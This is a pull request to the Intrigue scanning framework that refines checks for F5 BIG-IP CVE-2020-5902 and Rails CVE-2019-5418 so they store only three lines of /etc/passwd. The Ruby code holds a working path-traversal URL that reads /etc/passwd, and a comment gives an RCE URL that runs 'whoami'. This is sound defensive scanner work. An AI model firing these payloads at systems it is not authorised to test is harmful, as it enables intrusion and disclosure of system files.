### PR TITLE
Lfi vuln checks improve

### DIFF
--- a/lib/tasks/vuln/f5_bigip_configuration_utility_cve_2020_5902.rb
+++ b/lib/tasks/vuln/f5_bigip_configuration_utility_cve_2020_5902.rb
@@ -1,11 +1,11 @@
 module Intrigue
   module Task
   class  F5BigIpConfigUtilCve20205902 < BaseTask
-  
+
     def self.metadata
       {
         :name => "vuln/f5_bigip_configuration_utility_cve_2020_5902",
-        :pretty_name => "Vuln Check - F5 BIG-IP Config Utility RCE (CVE-2929-5902)",
+        :pretty_name => "Vuln Check - F5 BIG-IP Config Utility RCE (CVE-2020-5902)",
         :authors => ["jcran"],
         :description => "This task checks checks a F5 Config Util endpoint for a version vulnerable to CVE-2020-5902.",
         :type => "vuln_check",
@@ -16,35 +16,35 @@ module Intrigue
         :created_types => []
       }
     end
-  
+
     ## Default method, subclasses must override this
     def run
       super
-  
+
       require_enrichment
-  
-  
+
+
       ##
       ## Abitrary file read
       ##
       check_url = "#{_get_entity_name}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
-  
+
       ###
       ### RCE - https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
       ###
 
       response = http_get_body(check_url)
+      etc_passwd_body = "#{response}".split("\n").first(3).join("\n")
 
-      if response =~ /root:x:0:0/
-        _create_linked_issue "f5_bigip_configuration_utility_cve_2020_5902", {"proof" => response}
-      else 
+      if "#{etc_passwd_body}" =~ /root\:x/
+        _create_linked_issue "f5_bigip_configuration_utility_cve_2020_5902", {"proof" => etc_passwd_body}
+      else
         _log "Unable to verify vulnerability"
       end
 
     end
-  
-   
+
+
   end
   end
   end
-  

--- a/lib/tasks/vuln/rails_info_leak_cve_2019_5418.rb
+++ b/lib/tasks/vuln/rails_info_leak_cve_2019_5418.rb
@@ -45,12 +45,12 @@ class RailsFileExposureCve20195418 < BaseTask
       # Request
       uri = "#{_get_entity_name}/#{p}"
       response = http_request :get, "#{uri}", nil, headers
-      etc_passwd_body = response.body_utf8 if response
+      etc_passwd_body = response.body_utf8.split("\n").first(3).join("\n") if response
 
       # Check for validity
       if response
         if "#{etc_passwd_body}" =~ /root\:x/
-          _log "Got vulnerable response: #{response.body_utf8}"
+          _log "Vulnerable! Partial content of response: #{etc_passwd_body}"
           _create_linked_issue("rails_information_disclosure_cve_2019_5418",{data: etc_passwd_body })
         else
           _log "Got non-vulnerable response: #{response.body_utf8}"


### PR DESCRIPTION
This PR improves two LFI checks and extracts only the first three lines of `/etc/passwd`.
The following two checks were modified:
```
lib/tasks/vuln/rails_info_leak_cve_2019_5418.rb
lib/tasks/vuln/f5_bigip_configuration_utility_cve_2020_5902.rb
```

The other one tasked for change was `pulse_secure_list` in `lib/tasks/uri_brute_focused_content.rb`, however, since this check only looks for the presence of the file and never actually reads the content, I believe no change is required.